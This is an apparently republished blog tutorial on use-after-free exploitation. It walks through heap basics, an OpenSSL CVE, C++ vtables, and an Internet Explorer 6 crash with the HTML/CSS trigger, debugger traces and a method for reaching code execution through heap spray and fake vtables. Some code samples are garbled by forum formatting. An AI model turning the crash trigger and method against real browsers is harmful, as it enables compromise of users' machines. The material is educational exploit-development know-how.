• Beginners Guide to "Use after free Exploits #IE 6 0-day #Exploit Development"


    Yea right!

    Last week a friend asked few queries regarding use after free vulnerabilities, . It's been a while I wrote a tutorial so taught of cooking a beginners guide this week end. I wanted a live target for the tutorial so my plans were to run my fuzzer on an old version of IE 6, since it is easy to find a bug in and it's not worth to blog out any new versions 0-day . Any way I picked up the first test case IE crashed on and did some analysis to add it up to this tutorial.I din't spent much time with the crash since it's pointless to digg deep

    So this blog post I will explain in detail the following.

    1)The OS Heap and memory allocations.
    2)Use after free issues and example buggy codes.
    3) Analysis of a IE 6 crash, Use after free issue.
    4) Exploiting Use after free bugs.
    *Stay tuned for som Win8 IE10 stuffs ;


    The Basics of OS Memory Management :

    Memory used by program is divided into four,

    • The code area aka text segment [compiled program in memory ].
    • The globals [global variables are stored] .

    Initialized Data Segment
    Uninitialized Data Segment.

    • The heap, dynamically allocated variables.
    • The stack, parameters and local variables .



    Code Area:
    This is the region in a virtual adress space that holds the executing instructions.It is is assigned memory below the stack and heap, to prevent an overflow overwriting the code.

    The Globals:


    Initialized Data segment [DS].

    This region holds the global and static variables that are initialized by the programmer.

    For example:

    Code:
    int a = 0;
    char * fb ="fb1h2s";
    The string is stored in the initialized read only area.

    Uninitialized Data segment [BSS].

    For example:

    Code:
    int a 
    int b ;
    This would be in the BSS segment

    Stack:

    Stack is a [Last in First out] data structure , so it's basically used for local storages and function calls etc.It has got it's own registers and instructions sets. So it even hold the raw byte of instruction executed by the program. This is one of the reason why stack based vulnerabilities are easy to exploit.

    Stack allocations are done when variables are stored directly to memory .

    For example:

    PHP Code:
    void f()
    {
        if(
    true) {
            
    int b 0;
        }
        
    1;

    Here value of "b" is already declared and know so "int b" is allocated on the stack.
    *b is not available outside the if { } block, so the above program would have compilation issues.

    Heap :
    So considering the above if we need to handle memmory dynamically ,thats where Heap comes into picture. Heap overtakes the disability of stack, it's is the segment where dynamic memory allocation usually takes place.
    Unlike stack memmory allocations[LIFO] the term "heap memory allocations" is unrelated to heap data structure. It's basically a linked list of used and free blocks. When a request for memory is made by functions like (new,malloc,GlobalAlloc,LocalAlloc, malloc,HeapAlloc,RtlAllocateHeap etc) they are satisfied by providing a suitable block from one of the free blocks. This requires updating list of blocks on the heap [Heap Management ]. This meta information about the blocks on the heap is also stored on the heap often in a small area just in front of every block .The various OS implementation of heap management functions make use of these meta info when allocating and freeing heap. And the many heap based exploits out there make use of these heap management structures to achieve code execution by feeding them with malformed data.
    Note: Heap overflow and [Dangling pointer, Use after free bugs] are two diff things.



    Bulletins:

    • The heap size is predefined at application startup but can grow as per required.

    • You would use the heap if you don’t know exactly how much data you will need at runtime or if you need to allocate a lot of data.

    • Responsible for memory leak, you need to free the unused memory manually.

    • You need to manually free memory onces it is no more in use and that should never fall out of scope. The data is freed with GlobalFree , LocalFree, delete[] free etc functions .

    • Can have allocation failures if too big of a buffer is requested to be allocated.

    • All shared libraries and dynamically loaded modules in a process could access the heap. This same reason why you can do heap spraying on a browser using any loaded modules example: flash,java script ,vbs etc.

    memory management - What and where are the stack and heap? - Stack Overflow

    Example Program Demonstrating memory allocations.
    PHP Code:

    int 
    *x/* Uninitialized variable stored in bss*/
    int w/* Uninitialized variable stored in bss*/
    int y =10 /* Initialized variable stored in DSS*/
    void b()
    {
        if(
    1==1
        {
            
    malloc(sizeof(int)); /* Memmory allocated in Heap */
            /*memory not freed */
        
    }
      
    }

    void c()
    {
        
    free(x); /* Memory Freed */

    int main(void)
    {   
        static 
    int f =10  /* Initialized static variable stored in DS */
        
    static int i/* Uninitialized static variable stored in bss */
        
    b();
        
    c();
        return 
    0;

    http://www.geeksforgeeks.org/archives/14268

    In short large variables of arrays whose size may vary, heap memory allocation is used. So heap related security issues occur when
    1) Not freeing all of the memory allocated ending up with memory leaks.
    2)Using of already released memory would lead to Use after free security issues.
    3) Double freeing memory would cause memory corruptions .


    Use after free issues and example buggy codes.
    [I]#dangling pointers #use after free #double free

    Example Buggy program:

    Code:
    int main(void)
    {   
    char *ch_ptr = malloc(100);
    int i;
    for (i = 0; i < 99; i++) 
    {
    ch_ptr = 'A';
    free(ch_ptr);
    printf("%s\n", ch_ptr);
    
    }
    
    }
    
    


    Here at line 3 char_ptr is allocated a 100 bytes heap and later inside the for loop at line 8 the heap is deallocated. And at line 9 the de referenced pointer is called again. So this will trigger a memory corruption as follows.



    So the exploitation goes based on the nature of the crash, we will dig into the exploitation methods later.


    A Live example:

    For demonstration a good and easy to understand bug would be the CVE-2009-1379 OpenSSL from 0.9.8 to 0.9.8k use after free bug.


    The buggy code:

    https://bugzilla.redhat.com/attachme...71&action=diff
    The Bug:

    al is initilized at line 424 to &frag->msg_header and at line 533 it's freed using dtls1_hm_fragment_free(frag); and at line 536 if the following condition satisfies "(if al=0)" then program will try to access "frag" line 539 which was freed at line 533. So this will cause an invalid read operation , possibly crashing the app, and if we are some how able to control the adress that its reading form [heap spray!! or what ever], then we would be able to achieve code execution.


    The Fix:
    The simple fix to this was to add a temporary variable at line 533 "frag_len = frag->msg_header.frag_len;" holding frag->msg_header.frag_len. And later return frag_len instead of the freed object.

    Fuzzing for Use After Free and Fuzzers


    *We will have another blog post for this some time later.

    Exploiting Use after free bugs.

    C++ Virtual Functions :

    C++ matches a correct function call based on the type of the object at runtime. This is called dynamic binding and this is done by using the keyword "virtual". The virtual keyword instructs the compiler that it should choose the right function based on the object it's reference referred to rather than the type. These objects that are referred by virtual functions points to a virtual table VFTABLE[Virtual Function Table] . It's where all the virtual functions adress are stored. It would be the first DWORD in the object memory.


    Image Source:http://www.blackhat.com/presentation...07-afek-WP.pdf


    Example Program:

    PHP Code:
    #include<iostream>
    using namespace std;

    class 
    Test
    {
        public :

            
    virtual void Show()
            {
                
    cout<<"I am in Test Class"<<endl;
            }
    };

    class 
    Test1 : public Test
    {
          public:
               
    virtual void Show()
               {
                
    cout<<"I am in Test1 Class"<<endl;
               }

    };

    int main()
    {
        
    Test *Obj;

        
    Test Obj1;   // Base Class Object

        
    Test1 Obj2;  //Derived Class Object

        
    Obj = &Obj2;

        
    Obj->Show();  //In this case derived class show function called.

        
    Obj = &Obj1;

        
    Obj->Show(); //In this case Base class show function called.
    }

    [
    B]And the output is :[/B]

    [
    CODE]I am in Test1 Class
    I am in Test Class[/CODE
    Virtual Functions in C++
    IBM Linux Compilers

    The above program will have the following vftable structure.
    Code:
    Class Test size(8):
          +---
          |{vfptr}
          +---
          
          Test's Vftable:
          +--
          | {vfptr}
          | &test::Show
          
    Class Test1 size(8):
          +---
          |{vfptr}
          +---      
          
          Test1's Vftable:
          +--
          | {vfptr}
          | &test1::Show



    Code:
    004013D0  |. 8D45 C8        LEA EAX,DWORD PTR SS:[EBP-38]
    004013D3  |. 8945 F4        MOV DWORD PTR SS:[EBP-C],EAX
    004013D6  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
    004013D9  |. 8B10           MOV EDX,DWORD PTR DS:[EAX]
    004013DB  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
    004013DE  |. 890424         MOV DWORD PTR SS:[ESP],EAX
    004013E1  |. 8B02           MOV EAX,DWORD PTR DS:[EDX]
    004013E3  |. FFD0           CALL EAX
    
    
    Here EAX point to the Virtual Function table which point to calls the "Test1" 
    
    004013E5  |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000                  ; |ASCII "pause"
    004013EC  |. E8 AFF20000    CALL <JMP.&msvcrt.system>                              ; \system
    004013F1  |. 8D45 D8        LEA EAX,DWORD PTR SS:[EBP-28]
    004013F4  |. 8945 F4        MOV DWORD PTR SS:[EBP-C],EAX
    004013F7  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
    004013FA  |. 8B10           MOV EDX,DWORD PTR DS:[EAX]
    004013FC  |. 8B45 F4        MOV EAX,DWORD PTR SS:[EBP-C]
    004013FF  |. 890424         MOV DWORD PTR SS:[ESP],EAX
    00401402  |. 8B02           MOV EAX,DWORD PTR DS:[EDX]
    00401404  |. FFD0           CALL EAX
    Here EAX point to the Virtual Function table and calls the "Test" class
    
    
    00401406  |. C70424 0000440>MOV DWORD PTR SS:[ESP],vfunc.00440000                  ; |ASCII "pause"
    0040140D  |. E8 8EF20000    CALL <JMP.&msvcrt.system>                              ; \system
    00401412  |. B8 00000000    MOV EAX,0
    00401417  |. C9             LEAVE
    00401418  \. C3             RETN
    Lets put a break point on Call and analyze where EAX point to:

    Code:
    0:000> t
    eax=00410a5c ebx=00004000 ecx=0040cc50 edx=00441c84 esi=00def786 edi=00def6f2
    eip=004013e3 esp=0022ff10 ebp=0022ff78 iopl=0         nv up ei pl nz na pe nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
    image00400000+0x13e3:
    004013e3 ffd0            call    eax {image00400000+0x10a5c (00410a5c)}
    
    
    0:000> u 00410a5c
    image00400000+0x10a5c:
    00410a5c 55              push    ebp
    00410a5d 89e5            mov     ebp,esp
    00410a5f 83ec08          sub     esp,8
    00410a62 c744240419004400 mov     dword ptr [esp+4],offset image00400000+0x40019 (00440019)
    00410a6a c70424c0334400  mov     dword ptr [esp],offset image00400000+0x433c0 (004433c0)
    00410a71 e8a6b60200      call    image00400000+0x3c11c (0043c11c)
    00410a76 c7442404ecae4300 mov     dword ptr [esp+4],offset image00400000+0x3aeec (0043aeec)
    00410a7e 890424          mov     dword ptr [esp],eax
    Now that we are clear how VFtable works the exploitation of Use-after free could be done a couple of ways.The basic way of doing it would be.
    • De allocate an object having a VFT entry
    • Controlling the Vftable and pointing it to out own [shellcode]code.
    • So now when a Virtual Function call takes place it point to our injected code.

    Use After Free Exploitation [IE 6 0-day].


    HTML Code:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTAL 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" >
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <meta http-equiv="refresh" content="1">
    <title>FB1H2S Browser Test , soemthing weired here</title>
    <link href="sass.css" rel="stylesheet" type="text/css"/>
    
    <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js" type="text/javascript"></script>
    <script>
    
    document.write("FB1H2S Use After Free test#213");
    </script>
    
    </head>
    
    <body>
    
    <div style="float:left; width:770px; margin-left:8px;">
    
    <div class="fb1h2s_fb1h2s">
    
    </div>
    <span > </span>
    
    <div class="fb1h2s_fb1h2s_fb1h2s">
    
    <div class="fb1h2s_fb1h2s_fb1h4s" >
    IE WTF
    </div>
    
    
    
    <div class="aboutproduct">FB1H2s : FB!H2S : THE Garage 4 Hackers : Bla Bla Bla</div>
    </div>
    
    <div class="fb1h2s_fb1h2s_fb1h3s">
    
    </div>
    </div>
    
    </body>
    </html>
    sass.css
    
    .fb1h2s_fb1h2s,
    .fb1h2s_fb1h2s_fb1h2s{background-color:#fff;width:564px;float:left;height:auto;marg  in:5px 0 5px 9px}
    .fb1h2s_fb1h2s_fb1h3s{float:left;width:164px;margi  n-left:5px}
    .fb1h2s_fb1h2s_fb1h4s{width:551px;height:34px;back  ground-repeat:no-repeat;font-size:13px;font-weight:700;font-family:arial;margin-left:10px;float:left;padding:7px 0 0 10px}
    .aboutproduct{width:530px;height:auto;text-align:justify;line-height:18px;float:left;font-family:arial;color:#333;margin-bottom:10px;padding:0 5px 5px 13px}
    The program crashes on IE 6 with the following exception.

    Code:
    (914.8fc): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=04cb4740 ebx=00000000 ecx=04cb4740 edx=04b80bfc esi=04cd8b40 edi=00080000
    eip=7d51f463 esp=0013e5a4 ebp=0013e5f0 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    mshtml!CDispNode::GetRootNode+0x6:
    7d51f463 8b4808          mov     ecx,dword ptr [eax+8] ds:0023:04cb4748=????????

    The Backtrace.

    Code:
    0:000> knL
     # ChildEBP RetAddr  
    00 0013b478 7d54f5c0 mshtml!CDispNode::GetDispRoot+0x12
    01 0013b4bc 7d55118b mshtml!CDispNode::ReplaceNode+0xdb
    02 0013b50c 7d50b3ad mshtml!CLayout::EnsureDispNodeCore+0x348
    03 0013b5bc 7d688af4 mshtml!CLayout::EnsureDispNode+0x5a
    04 0013b7f0 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0x3ff
    05 0013b808 7d50a136 mshtml!CFlowLayout::CalcSizeCore+0x2f
    06 0013b840 7d5069d1 mshtml!CFlowLayout::CalcSizeVirtual+0x17e
    07 0013b954 7d539257 mshtml!CLayout::CalcSize+0x224
    08 0013b9c8 7d539def mshtml!CFlowLayout::MeasureSite+0x1e5
    09 0013ba0c 7d539d26 mshtml!CFlowLayout::GetSiteWidth+0x12b
    0a 0013ba38 7d6ca5e3 mshtml!CLSMeasurer::GetSiteWidth+0x80
    0b 0013bb44 7d5befb2 mshtml!CRecalcLinePtr::AlignObjects+0x30b
    0c 0013bbc4 7d5136e0 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOLCore+0x1d7
    0d 0013bc14 7d514345 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOL+0xa9
    0e 0013bcc8 7d5131cd mshtml!CRecalcLinePtr::MeasureLine+0x384
    0f 0013c084 7d5114a5 mshtml!CDisplay::RecalcLinesWithMeasurer+0x502
    10 0013c204 7d506252 mshtml!CDisplay::RecalcLines+0x67
    11 0013c21c 7d506529 mshtml!CDisplay::RecalcView+0x6b
    12 0013c2c4 7d689582 mshtml!CFlowLayout::CalcTextSize+0x2ee
    13 0013c4fc 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0xe8d
    Disassembly of the crashed function:

    Code:
    mshtml!CDispNode::GetRootNode+0x6:
    7d51f463 8b4808          mov     ecx,dword ptr [eax+8]
    7d51f466 85c9            test    ecx,ecx
    7d51f468 7404            je      mshtml!CDispNode::GetRootNode+0xd (7d51f46e)
    7d51f46a 8bc1            mov     eax,ecx
    7d51f46c ebf5            jmp     mshtml!CDispNode::GetRootNode+0x6 (7d51f463)
    7d51f46e c3              ret
    The entire code flow is as follows.

    Code:
    mshtml!CDispNode::GetDispRoot:
    7d51f437 8bff            mov     edi,edi
    7d51f439 56              push    esi
    7d51f43a e822000000      call    mshtml!CDispNode::GetRootNode (7d51f461)
    7d51f43f 8bf0            mov     esi,eax
    7d51f441 85f6            test    esi,esi
    7d51f443 0f84c1020000    je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
    7d51f449 8b06            mov     eax,dword ptr [esi]
    7d51f44b 8bce            mov     ecx,esi
    7d51f44d ff5034          call    dword ptr [eax+34h]
    7d51f450 85c0            test    eax,eax
    7d51f452 0f84b2020000    je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
    7d51f458 8bc6            mov     eax,esi
    7d51f45a 5e              pop     esi
    7d51f45b c3              ret
    7d51f45c 90              nop
    7d51f45d 90              nop
    7d51f45e 90              nop
    7d51f45f 90              nop
    7d51f460 90              nop
    mshtml!CDispNode::GetRootNode:
    7d51f461 8bc1            mov     eax,ecx
    7d51f463 8b4808          mov     ecx,dword ptr [eax+8] ds:0023:04cb4748=????????
    7d51f466 85c9            test    ecx,ecx
    7d51f468 7404            je      mshtml!CDispNode::GetRootNode+0xd (7d51f46e)
    7d51f46a 8bc1            mov     eax,ecx
    7d51f46c ebf5            jmp     mshtml!CDispNode::GetRootNode+0x6 (7d51f463)
    7d51f46e c3              ret
    The C equivalent code:


    PHP Code:
    int __thiscall CElement__GetParentAncestorSafe(int thisint a2)
    {
      
    int result// eax@1
      
    int v3// ecx@1
      
    int v4// ecx@2

      
    v3 = *(_DWORD *)(this 16);
      
    result 0;
      if ( 
    v3 )
      {
        
    v4 = *(_DWORD *)(v3 4);
        if ( 
    v4 )
        {
          do
          {
            if ( *(
    _BYTE *)(v4 8) == a2 )
              break;
            
    v4 = *(_DWORD *)(v4 4);
          }
          while ( 
    v4 );
          if ( 
    v4 )
            
    result = *(_DWORD *)v4;
        }
      }
      return 
    result;
    }

    /(
    7D51F437)
    void *__thiscall CDispNode__GetDispRoot(void *this)
    {
      
    void *v1// eax@1
      
    void *v2// esi@1
      
    void *result// eax@3

      
    v1 CDispNode__GetRootNode(this);
      
    v2 v1;
      if ( 
    v1 && (*(int (__thiscall **)(_DWORD))(*(_DWORD *)v1 52))(v1) )
        
    result v2;
      else
        
    result 0;
      return 
    result;


    The program crashes due to a use after free issue.

    Code:
    >u 7d51f463 
    7d51f463 8b4808          mov     ecx,dword ptr [eax+8]
    Here EAX is pointer to an Object element and ECX to the vftable. Here the object pointed to by the Vftable is freed, and there by the memory location pointed by EAX.



    Code:
    0:000> d 04cb4748
    04cb4748  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    04cb4758  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    04cb4768  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????
    04cb4778  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??    ????????????????

    If you look at the next instructions , we notice the following .

    Code:
    7d51f466 85c9            test    ecx,ecx 
    7d51f468 7404            je      mshtml!CDispNode::GetRootNode+0xd (7d51f46e)
    7d51f46a 8bc1            mov     eax,ecx
    7d51f46c ebf5            jmp     mshtml!CDispNode::GetRootNode+0x6 (7d51f463)
    7d51f46e c3              ret
    The Pesudo Code:

    Code:
    ecx = dword ptr[ eax+8 ] 
     
    if (ecx ==0):
              
     -7d51f46e: return(eax)  to 7d51f43f [calling module]
    |
    |  else:
    |      loop()
    |
    |->  and at:7d51f43f  
    
    {
    
    
     mov     esi,eax  <-- value of eax returned form the above function
      test    esi,esi    <-- if (esi) ==0  take jmp
     je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
    
    
     mov     eax,dword ptr [esi]  ds:0023:04ca1d40=
                   <-- move to eax data pointed by esi
    
    
     mov     ecx,esi  <-- not usefull 
     call    dword ptr [eax+34h] <-- call adress pointed by eax+34h
    
    }
    So if we can make { mov ecx,dword ptr [eax+8] }point to the heap such a way that EAX+8 contains [00000000] and EAX contains a adress we control , we would have code execution. We can initialize this area using heap spray.

    What I did was arranged my HTML tags such a way that it would leave a lot of garbage values mainly null in the EAX pointed memory, and then the program would crash at the call instruction. This is never the right way of doing nor reliable, but it was working fine for me.

    No we could take control of the program here.

    Code:
    7d51f44d ff5034          call    dword ptr [eax+34h]
    Code:
    (36c.440): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=01c53380 ecx=01c3e6e0 edx=000000a4 esi=01c3e6e0 edi=01c071f4
    eip=7d51f44d esp=0013b478 ebp=0013b4bc iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    mshtml!CDispNode::GetDispRoot+0x12:
    7d51f44d ff5034          call    dword ptr [eax+34h]  ds:0023:00000034=????????
    Missing image name, possible paged-out or corrupt data.
    Missing image name, possible paged-out or corrupt data.
    Code:
    mshtml!CDispNode::GetDispRoot:
    7d51f437 8bff            mov     edi,edi
    7d51f439 56              push    esi
    7d51f43a e822000000      call    mshtml!CDispNode::GetRootNode (7d51f461)
    7d51f43f 8bf0            mov     esi,eax
    7d51f441 85f6            test    esi,esi
    7d51f443 0f84c1020000    je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
    7d51f449 8b06            mov     eax,dword ptr [esi]
    7d51f44b 8bce            mov     ecx,esi
    7d51f44d ff5034          call    dword ptr [eax+34h]  ds:0023:00000034=????????
    7d51f450 85c0            test    eax,eax
    7d51f452 0f84b2020000    je      mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)
    7d51f449 8b06 mov eax,dword ptr [esi]

    Move DWORD (a 32-bit/4-byte value) in memory location specified by ESI[01c3e6e0]-->"00000000" into register EAX, so EAX becomes [00000000]

    7d51f44d ff5034 call dword ptr [eax+34h]

    The crash is at a virtual Call with [Register + offset ] . The Vftable is in eax + offset[34h] the adress of function to be executed . In this case it would be 13th entry in the table. Now that it's pointing to [00000000] the program crashes.

    We can take control of the program here and have code execution, for that we need to find the type of object that was freed and the no of bytes that was allocated . Knowing these details we would be able to build fake objects of that size using JS . So that a the call at 7d51f463 [eax+8] would land on our crafted Vftable object and return [00000000] and

    Code:
    7d51f463 8b4808          mov     ecx,dword ptr [eax+8]
    a call to

    Code:
    7d51f44d ff5034 call dword ptr [eax+34h]
    Vftable+34h would make the program land on our shellcode.

    There are couple of ways to exploit this a good reference would be this.

    1) The double reference exploit


    Requirements:

    A controllable VFTable pointer.

    Method:

    Our own code is placed in the deallocated object or some where in the memory where we could point to via Vftable.

    Then we replace the VFTable pointer by one which points to some memory
    later we will use this as VFTable pointing back to where we put our code.

    source:

    2) The VFTable exploit

    Requirements:


    A controllable VFTable .
    Method:
    Our code is injected in the VFTable which is made to point to itself.

    Depends:

    This this achieved by the system allocation process.

    The Lookaside exploit

    Requirements:


    A controllable heap allocation / heap deallocation cycle.

    Method:


    Since the system reallocates a freed memory , we craft the code in such a way that when reallocation takes place our injected code is used in the reallocation cycle.

    Read More: http://www.blackhat.com/presentation...irov-apr19.pdf
    Read in detail here a similar approach http://securityevaluators.com/files/.../isewoot08.pdf


    For choosing an appropriate method for exploitation we need determine what all we control in the current scenario and understand more about the crash. We can either use the debugger for this purpose or reverse engineer the current code to figure out those details.

    *Thanks to w3devil and Zarul for proof reading the doc


    Cheers.


    References on Heap :

    A practical C storage class scope and memory allocation programming online training - C language references, working program examples, source code and memory related function library
    Data segment - Wikipedia, the free encyclopedia
    Memory segmentation - Wikipedia, the free encyclopedia
    .bss - Wikipedia, the free encyclopedia
    Memory Layout of C Programs - GeeksforGeeks | GeeksforGeeks
    gperftools - Fast, multi-threaded malloc() and nifty performance analysis tools - Google Project Hosting
    A Heap of Risk - The H Security: News and Features
    http://x9090.blogspot.in/2010/03/tut...rial-from.html
    http://en.wikibooks.org/wiki/C_Progr...Use_after_free
    http://www.quora.com/Why-is-dynamic-...ory-allocation
    http://eli.thegreenplace.net/2011/09...out-on-x86-64/

    Exploitation References :
    http://d0cs4vage.blogspot.in/2011/06...ugs-patch.html
    http://www.phreedom.org/research/hea...feng-shui.html
    http://securityevaluators.com/files/.../isewoot08.pdf
    http://www.exploit-monday.com/2011_11_13_archive.html
    www.blackhat.com/presentations/bh-usa-09/MCDONALD/BHUSA09-McDonald-WindowsHeap-PAPER.pdf
    http://www.phreedom.org/research/hea...feng-shui.html
    http://www.thegreycorner.com/2010/01...-internet.html
    https://www.owasp.org/images/0/01/OW..._Heapspray.pdf
    https://www.corelan.be/index.php/201...spray_8211_IE6
    http://www.blackhat.com/presentation...07-afek-WP.pdf
    http://www.blackhat.com/presentation...irov-apr19.pdf
    http://www.exploit-monday.com/2011/0...r-free_07.html
    http://www.vupen.com/blog/20120116.A...30_Part_II.php


    Protection Mechanisms:
    http://robert.ocallahan.org/2010/10/...-using_15.html
    This article was originally published in blog: Beginners Guide to "Use after free Exploits #IE 6 0-day #Exploit Development" started by fb1h2s
    Comments 1 Comment
    1. centroid's Avatar
      centroid -
      Very good article. Thanks for so many references.
  • G4H Facebook

  • G4H Twitter